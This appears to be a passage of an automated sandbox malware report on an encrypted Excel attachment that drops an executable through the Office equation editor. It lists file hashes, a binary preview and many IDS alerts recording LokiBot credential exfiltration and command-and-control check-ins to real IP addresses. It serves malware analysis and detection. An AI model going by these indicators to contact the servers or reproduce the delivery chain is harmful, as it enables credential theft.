                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview: 1
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                Process:C:\Users\Public\vbc.exe
                File Type:data
                Category:dropped
                Size (bytes):32430
                Entropy (8bit):0.6025336819236282
                Encrypted:false
                SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeh:i
                MD5:1A3D31826F727A043FE4CC0C448264C3
                SHA1:B9D22C89F4678CBCFB9020F0344FE88449566C0F
                SHA-256:02CAC96B35CDFFA917839EFF306896676F0A8CC4B003962FEF0FF8DC773125CB
                SHA-512:1E32EC6515B98C3BE70BC251B29F4F66DC136CCEC4E30726EDAE365438AEF1AA5FB0E7147DD57A765815D72142055F23E5FE96DD2F3B91909BA305AB817E7F78
                Malicious:false
                Reputation:low
                Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................
                C:\Users\user\Desktop\~$MV NAGOYA TRADER.xlsx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:moderate, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\Public\vbc.exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):584704
                Entropy (8bit):7.31402329860771
                Encrypted:false
                SSDEEP:12288:ek3fNrqcsXP04X8QGETcxAtAHp5LcPgKaIJVPfHAZ0xnJWBIlO+T2U7H:vfYJ/04XuE0Agp54PH
                MD5:3EE960D7D595C82B47CE28164AFED056
                SHA1:FD750607C392744A3302538C2A0B0FE810D199BB
                SHA-256:7596F11C31683CC9137672D261E19B4DD61952BAD97545080A1663AB475283B2
                SHA-512:F5432D376F7390C3A4EAD25CD167286FB9B99421354302AFF7739B30AB2DF825EAE16D05DE1308268DF27B60B01F8150A42707C7B6367A5D051E0AD443A49462
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 33%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V................0.................. ... ....@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........................V...{...........................................].:....w..H.3...c.abf............%..........;x;x. @...o.p.1.........G.e..W..@+...Qx..".B.Y.|^..C...3&..S..~........../......uv/@..iMM.%.....'.......=1.4z..|.)..Q\.KU...M.A{.|...;...51.F.lp..e..niy...C....U1\M.Ri......(..R?..EN.%....v~..l........#$...)J.B=.5.q...@U.G.....e..c.z....Zu...A.Wua)b.1...`..:<^...A\){...;...,...g..2.......?p{x@...D'.%..e`$x..hP........8O...VZ........#.ck.p-.T...V

                Static File Info

                General

                File type:CDFV2 Encrypted
                Entropy (8bit):7.996815692043313
                TrID:
                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                File name:MV NAGOYA TRADER.xlsx
                File size:2653184
                MD5:dd41f88e3d53755f0aa1318bf473d08b
                SHA1:54ccf49aaf860ab2531b37dd38adc0273b6f2551
                SHA256:6f68432c8c109e52980cef46236114266c97a5791808053b07a943d7686f8f55
                SHA512:7596de55f96cfb9b2a38a21750209b1941a9e9b6ef6a801fe3b56d81cbf118296042b74fa032ce71546c92c09fe1569d1e2887f65fd2a0aa40d600e70bfd23a6
                SSDEEP:49152:7ypWkhzJao3Wmqugef4weOPWP2hMpNm1NBaw3ZraPJSx6JSutUcZYVg:mzmm1g1weOJyp+rE8x6JPUTg
                File Content Preview:........................>...................)...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|.......~......................

                File Icon

                Icon Hash:e4e2aa8aa4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "MV NAGOYA TRADER.xlsx"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:False

                Streams

                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                General
                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                File Type:data
                Stream Size:64
                Entropy:2.73637206947
                Base64 Encoded:False
                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                General
                Stream Path:\x6DataSpaces/DataSpaceMap
                File Type:data
                Stream Size:112
                Entropy:2.7597816111
                Base64 Encoded:False
                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                General
                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                File Type:data
                Stream Size:200
                Entropy:3.13335930328
                Base64 Encoded:False
                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                General
                Stream Path:\x6DataSpaces/Version
                File Type:data
                Stream Size:76
                Entropy:2.79079600998
                Base64 Encoded:False
                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                Stream Path: EncryptedPackage, File Type: data, Stream Size: 2628408
                General
                Stream Path:EncryptedPackage
                File Type:data
                Stream Size:2628408
                Entropy:7.99993139379
                Base64 Encoded:True
                Data ASCII:# . ( . . . . . . . $ Y j E A . . . \\ . * . . . . . . . . , . S . . . g . . . . . . . . _ 0 g W . . . . . . . . . I . . % l # U < V . @ . . 8 . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } . E . . . . . q . . . . . . O } .
                Data Raw:23 1b 28 00 00 00 00 00 89 ab 24 59 6a 45 41 a1 01 1b 5c a5 2a 09 b1 8f 8b e5 1b ec be 2c 12 53 da aa d9 67 f5 18 07 8a cb 20 7f cc 08 5f 30 67 57 12 e4 d5 10 a3 99 0e 9c ad 49 ed b9 25 6c 23 55 3c 56 db 40 c9 f3 38 df 03 ee bf 04 4f 7d ba 45 db fe ef d9 b2 71 a7 df 03 ee bf 04 4f 7d ba 45 db fe ef d9 b2 71 a7 df 03 ee bf 04 4f 7d ba 45 db fe ef d9 b2 71 a7 df 03 ee bf 04 4f 7d ba
                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                General
                Stream Path:EncryptionInfo
                File Type:data
                Stream Size:224
                Entropy:4.57774966758
                Base64 Encoded:False
                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . a . . : . . . . . / , D . . . . . j l t ; J q . . . h . . . D . . . . . L . y . . . # Y $ O . . . ( k . . . G . . . : @ . . . _ . z
                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                12/21/20-08:33:20.406845TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22103.141.138.119
                12/21/20-08:33:32.340297TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916880192.168.2.22185.193.143.118
                12/21/20-08:33:32.340297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22185.193.143.118
                12/21/20-08:33:32.340297TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22185.193.143.118
                12/21/20-08:33:32.340297TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916880192.168.2.22185.193.143.118
                12/21/20-08:33:32.340297TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4916880192.168.2.22185.193.143.118
                12/21/20-08:33:33.097277TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916980192.168.2.22185.193.143.118
                12/21/20-08:33:33.097277TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.22185.193.143.118
                12/21/20-08:33:33.097277TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.22185.193.143.118
                12/21/20-08:33:33.097277TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916980192.168.2.22185.193.143.118
                12/21/20-08:33:33.097277TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4916980192.168.2.22185.193.143.118
                12/21/20-08:33:33.482025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.22185.193.143.118
                12/21/20-08:33:33.482025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.22185.193.143.118
                12/21/20-08:33:33.482025TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.22185.193.143.118
                12/21/20-08:33:33.482025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.22185.193.143.118
                12/21/20-08:33:33.482025TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917080192.168.2.22185.193.143.118
                12/21/20-08:33:33.668129TCP2025483ET TROJAN LokiBot Fake 404 Response8049170185.193.143.118192.168.2.22
                12/21/20-08:33:33.982963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.22185.193.143.118
                12/21/20-08:33:33.982963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.22185.193.143.118
                12/21/20-08:33:33.982963TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.22185.193.143.118
                12/21/20-08:33:33.982963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.22185.193.143.118
                12/21/20-08:33:33.982963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917180192.168.2.22185.193.143.118
                12/21/20-08:33:34.172880TCP2025483ET TROJAN LokiBot Fake 404 Response8049171185.193.143.118192.168.2.22
                12/21/20-08:33:34.470275TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.22185.193.143.118
                12/21/20-08:33:34.470275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.22185.193.143.118
                12/21/20-08:33:34.470275TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.22185.193.143.118
                12/21/20-08:33:34.470275TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.22185.193.143.118
                12/21/20-08:33:34.470275TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917280192.168.2.22185.193.143.118
                12/21/20-08:33:34.668154TCP2025483ET TROJAN LokiBot Fake 404 Response8049172185.193.143.118192.168.2.22
                12/21/20-08:33:34.978436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.22185.193.143.118
                12/21/20-08:33:34.978436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.22185.193.143.118
                12/21/20-08:33:34.978436TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.22185.193.143.118
                12/21/20-08:33:34.978436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.22185.193.143.118
                12/21/20-08:33:34.978436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917380192.168.2.22185.193.143.118
                12/21/20-08:33:35.166301TCP2025483ET TROJAN LokiBot Fake 404 Response8049173185.193.143.118192.168.2.22
                12/21/20-08:33:35.458680TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.22185.193.143.118
                12/21/20-08:33:35.458680TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.22185.193.143.118
                12/21/20-08:33:35.458680TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.22185.193.143.118
                12/21/20-08:33:35.458680TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.22185.193.143.118
                12/21/20-08:33:35.458680TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917480192.168.2.22185.193.143.118
                12/21/20-08:33:35.642135TCP2025483ET TROJAN LokiBot Fake 404 Response8049174185.193.143.118192.168.2.22
                12/21/20-08:33:35.934755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.22185.193.143.118
                12/21/20-08:33:35.934755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22185.193.143.118
                12/21/20-08:33:35.934755TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22185.193.143.118
                12/21/20-08:33:35.934755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22185.193.143.118
                12/21/20-08:33:35.934755TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917580192.168.2.22185.193.143.118
                12/21/20-08:33:36.116868TCP2025483ET TROJAN LokiBot Fake 404 Response8049175185.193.143.118192.168.2.22
                12/21/20-08:33:36.417719TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22185.193.143.118
                12/21/20-08:33:36.417719TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22185.193.143.118
                12/21/20-08:33:36.417719TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22185.193.143.118
                12/21/20-08:33:36.417719TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22185.193.143.118
                12/21/20-08:33:36.417719TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917680192.168.2.22185.193.143.118
                12/21/20-08:33:36.615480TCP2025483ET TROJAN LokiBot Fake 404 Response8049176185.193.143.118192.168.2.22
                12/21/20-08:33:36.908483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22185.193.143.118
                12/21/20-08:33:36.908483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22185.193.143.118
                12/21/20-08:33:36.908483TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22185.193.143.118
                12/21/20-08:33:36.908483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22185.193.143.118
                12/21/20-08:33:36.908483TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917780192.168.2.22185.193.143.118
                12/21/20-08:33:37.104372TCP2025483ET TROJAN LokiBot Fake 404 Response8049177185.193.143.118192.168.2.22
                12/21/20-08:33:37.413851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22185.193.143.118
                12/21/20-08:33:37.413851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22185.193.143.118
                12/21/20-08:33:37.413851TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22185.193.143.118
                12/21/20-08:33:37.413851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22185.193.143.118
                12/21/20-08:33:37.413851TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917880192.168.2.22185.193.143.118
                12/21/20-08:33:37.608020TCP2025483ET TROJAN LokiBot Fake 404 Response8049178185.193.143.118192.168.2.22
                12/21/20-08:33:37.896116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22185.193.143.118
                12/21/20-08:33:37.896116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22185.193.143.118
                12/21/20-08:33:37.896116TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22185.193.143.118
                12/21/20-08:33:37.896116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22185.193.143.118
                12/21/20-08:33:37.896116TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917980192.168.2.22185.193.143.118
                12/21/20-08:33:38.091372TCP2025483ET TROJAN LokiBot Fake 404 Response8049179185.193.143.118192.168.2.22
                12/21/20-08:33:38.365580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22185.193.143.118
                12/21/20-08:33:38.365580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22185.193.143.118
                12/21/20-08:33:38.365580TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22185.193.143.118
                12/21/20-08:33:38.365580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22185.193.143.118
                12/21/20-08:33:38.365580TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918080192.168.2.22185.193.143.118
                12/21/20-08:33:38.546296TCP2025483ET TROJAN LokiBot Fake 404 Response8049180185.193.143.118192.168.2.22
                12/21/20-08:33:38.845704TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22185.193.143.118
                12/21/20-08:33:38.845704TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22185.193.143.118
                12/21/20-08:33:38.845704TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22185.193.143.118
                12/21/20-08:33:38.845704TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22185.193.143.118
                12/21/20-08:33:38.845704TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918180192.168.2.22185.193.143.118
                12/21/20-08:33:39.040893TCP2025483ET TROJAN LokiBot Fake 404 Response8049181185.193.143.118192.168.2.22
                12/21/20-08:33:39.320762TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22185.193.143.118
                12/21/20-08:33:39.320762TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22185.193.143.118
                12/21/20-08:33:39.320762TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22185.193.143.118
                12/21/20-08:33:39.320762TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22185.193.143.118
                12/21/20-08:33:39.320762TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918280192.168.2.22185.193.143.118
                12/21/20-08:33:39.513074TCP2025483ET TROJAN LokiBot Fake 404 Response8049182185.193.143.118192.168.2.22
                12/21/20-08:33:39.813664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22185.193.143.118
                12/21/20-08:33:39.813664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22185.193.143.118
                12/21/20-08:33:39.813664TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22185.193.143.118
                12/21/20-08:33:39.813664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22185.193.143.118
                12/21/20-08:33:39.813664TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918380192.168.2.22185.193.143.118
                12/21/20-08:33:40.004152TCP2025483ET TROJAN LokiBot Fake 404 Response8049183185.193.143.118192.168.2.22
                12/21/20-08:33:40.294286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22185.193.143.118
                12/21/20-08:33:40.294286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22185.193.143.118
                12/21/20-08:33:40.294286TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22185.193.143.118
                12/21/20-08:33:40.294286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22185.193.143.118
                12/21/20-08:33:40.294286TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918480192.168.2.22185.193.143.118
                12/21/20-08:33:40.472325TCP2025483ET TROJAN LokiBot Fake 404 Response8049184185.193.143.118192.168.2.22
                12/21/20-08:33:40.742276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22185.193.143.118
                12/21/20-08:33:40.742276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22185.193.143.118
                12/21/20-08:33:40.742276TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22185.193.143.118
                12/21/20-08:33:40.742276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22185.193.143.118
                12/21/20-08:33:40.742276TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918580192.168.2.22185.193.143.118
                12/21/20-08:33:40.927835TCP2025483ET TROJAN LokiBot Fake 404 Response8049185185.193.143.118192.168.2.22
                12/21/20-08:33:41.221610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22185.193.143.118
                12/21/20-08:33:41.221610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22185.193.143.118
                12/21/20-08:33:41.221610TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22185.193.143.118
                12/21/20-08:33:41.221610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22185.193.143.118
                12/21/20-08:33:41.221610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918680192.168.2.22185.193.143.118
                12/21/20-08:33:41.413666TCP2025483ET TROJAN LokiBot Fake 404 Response8049186185.193.143.118192.168.2.22
                12/21/20-08:33:41.708348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22185.193.143.118
                12/21/20-08:33:41.708348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22185.193.143.118
                12/21/20-08:33:41.708348TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22185.193.143.118
                12/21/20-08:33:41.708348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22185.193.143.118
                12/21/20-08:33:41.708348TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918780192.168.2.22185.193.143.118
                12/21/20-08:33:41.895755TCP2025483ET TROJAN LokiBot Fake 404 Response8049187185.193.143.118192.168.2.22
                12/21/20-08:33:42.188874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22185.193.143.118
                12/21/20-08:33:42.188874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22185.193.143.118
                12/21/20-08:33:42.188874TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22185.193.143.118
                12/21/20-08:33:42.188874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22185.193.143.118
                12/21/20-08:33:42.188874TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918880192.168.2.22185.193.143.118
                12/21/20-08:33:42.381173TCP2025483ET TROJAN LokiBot Fake 404 Response8049188185.193.143.118192.168.2.22
                12/21/20-08:33:42.666408TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22185.193.143.118
                12/21/20-08:33:42.666408TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22185.193.143.118
                12/21/20-08:33:42.666408TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22185.193.143.118
                12/21/20-08:33:42.666408TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22185.193.143.118
                12/21/20-08:33:42.666408TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4918980192.168.2.22185.193.143.118
                12/21/20-08:33:42.848619TCP2025483ET TROJAN LokiBot Fake 404 Response8049189185.193.143.118192.168.2.22
                12/21/20-08:33:43.123722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22185.193.143.118
                12/21/20-08:33:43.123722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22185.193.143.118
                12/21/20-08:33:43.123722TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22185.193.143.118
                12/21/20-08:33:43.123722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22185.193.143.118
                12/21/20-08:33:43.123722TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919080192.168.2.22185.193.143.118
                12/21/20-08:33:43.317317TCP2025483ET TROJAN LokiBot Fake 404 Response8049190185.193.143.118192.168.2.22
                12/21/20-08:33:43.611075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22185.193.143.118
                12/21/20-08:33:43.611075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22185.193.143.118
                12/21/20-08:33:43.611075TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22185.193.143.118
                12/21/20-08:33:43.611075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22185.193.143.118
                12/21/20-08:33:43.611075TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4919180192.168.2.22185.193.143.118
